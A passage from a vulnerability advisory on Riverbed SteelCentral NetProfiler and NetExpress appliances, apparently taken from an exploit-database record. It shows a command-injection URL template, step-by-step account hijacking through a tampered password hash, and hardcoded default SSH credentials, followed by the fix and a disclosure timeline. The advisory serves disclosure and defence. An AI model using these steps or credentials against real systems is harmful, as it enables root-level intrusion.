https://<host>/sensor/ta_loader.php?cmd=<COMMAND>&class=/etc/hosts\r\n \r\n==Account Hijacking==\r\nThe password change functionality under the\r\n\u2018/index.php?page=security_compliance\u2019 page is vulnerable to a logic bug\r\nwhich allows account hijacking via arbitrary password reset. Although\r\nthe functionality prompts for the current account password before\r\nallowing the user to set a new password, the hashed credentials of all\r\nthe system accounts on the SteelCentral NetProfiler and NetExpress\r\nappliances are disclosed within the \u2018accountscredentialsid\u2019 hidden\r\nparameter in the page source code. The contents of the parameter are the\r\nbase64-encoded representation of a serialized PHP object containing the\r\ncredentials data.\r\n \r\nThis not only openly discloses the contents of the /etc/shadow file, but\r\ncan be also abused to carry out arbitrary password resets since the\r\ncurrent password verification is carried out on client-side against the\r\n\u2018oldpassword\u2019 field value within the serialized string. An attacker can\r\nfirst generate a valid SHA-512 hash for an arbitrary current password\r\nvalue along with computing the hash length. Then the password change\r\nHTTP request can be intercepted to decode the base64-encoded serialized\r\nobject and modify the \u2018oldpassword\u2019 hash value and its length for the\r\ntarget system account to hijack with the generated SHA-512 hash of the\r\nchosen current password value. The malicious string can now be base64\r\nencoded back and used to replace the original request string.\r\n \r\nAfter clicking the \u2018Configure Now\u2019 button the application will validate\r\nthe current password value provided through the web interface against\r\nthe injected hash value, successfully setting the new password to the\r\narbitrary value chosen by the attacker.\r\n \r\n==Hardcoded default credentials==\r\nMultiple system accounts are configured on every deployment of the\r\nSteelCentral NetProfiler and NetExpress virtual appliances with the same\r\nhardcoded default credentials publicly available on the web.\r\n \r\nUsers => mazu, dhcp, root\r\nPassword => bb!nmp4y\r\n \r\nThe default \u2018mazu\u2019 user sudo configuration allows the execution of all\r\nshell commands as root without being prompted for a password. The user\r\n'mazu' is the only privileged user account having remote SSH access to\r\nthe SteelCentral NetProfiler and NetExpress appliances (root SSH access\r\nis restricted to localhost only). However, the application does not\r\nenforce a password change for the built-in 'mazu' user during\r\nconfiguration time or after the first login. These insecure settings can\r\nbe exploited as a remote backdoor to gain a privileged SSH shell to the\r\ntarget system.\r\n \r\n+----------+\r\n| Solution |\r\n+----------+\r\nUpgrade Riverbed SteelCentral Netprofiler/NetExpress to version 10.9.0.\r\n \r\nAt the time of this writing, although the account hijacking\r\nvulnerability has been resolved, the contents of the /etc/shadow file\r\nare still disclosed in the hidden parameter \u2018originalsettingsid\u2019 when\r\nbrowsing to \u2018/index.php?page=security_compliance\u2019.\r\n \r\n+------------+\r\n| Timeline |\r\n+------------+\r\n24/03/2016 \u2013 Initial disclosure to Riverbed.\r\n25/03/2016 \u2013 Vendor confirms receipt of advisory.\r\n18/04/2016 \u2013 Sent follow up email asking for a status update\r\n19/04/2016 \u2013 Vendor replies engineering team is working on software patches.\r\n13/06/2016 \u2013 Vendor releases patched software build.\r\n27/06/2016 \u2013 Public Disclosure\r\n \r\n+------------+\r\n| Additional |\r\n+------------+\r\nhttp://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25136"}]}}
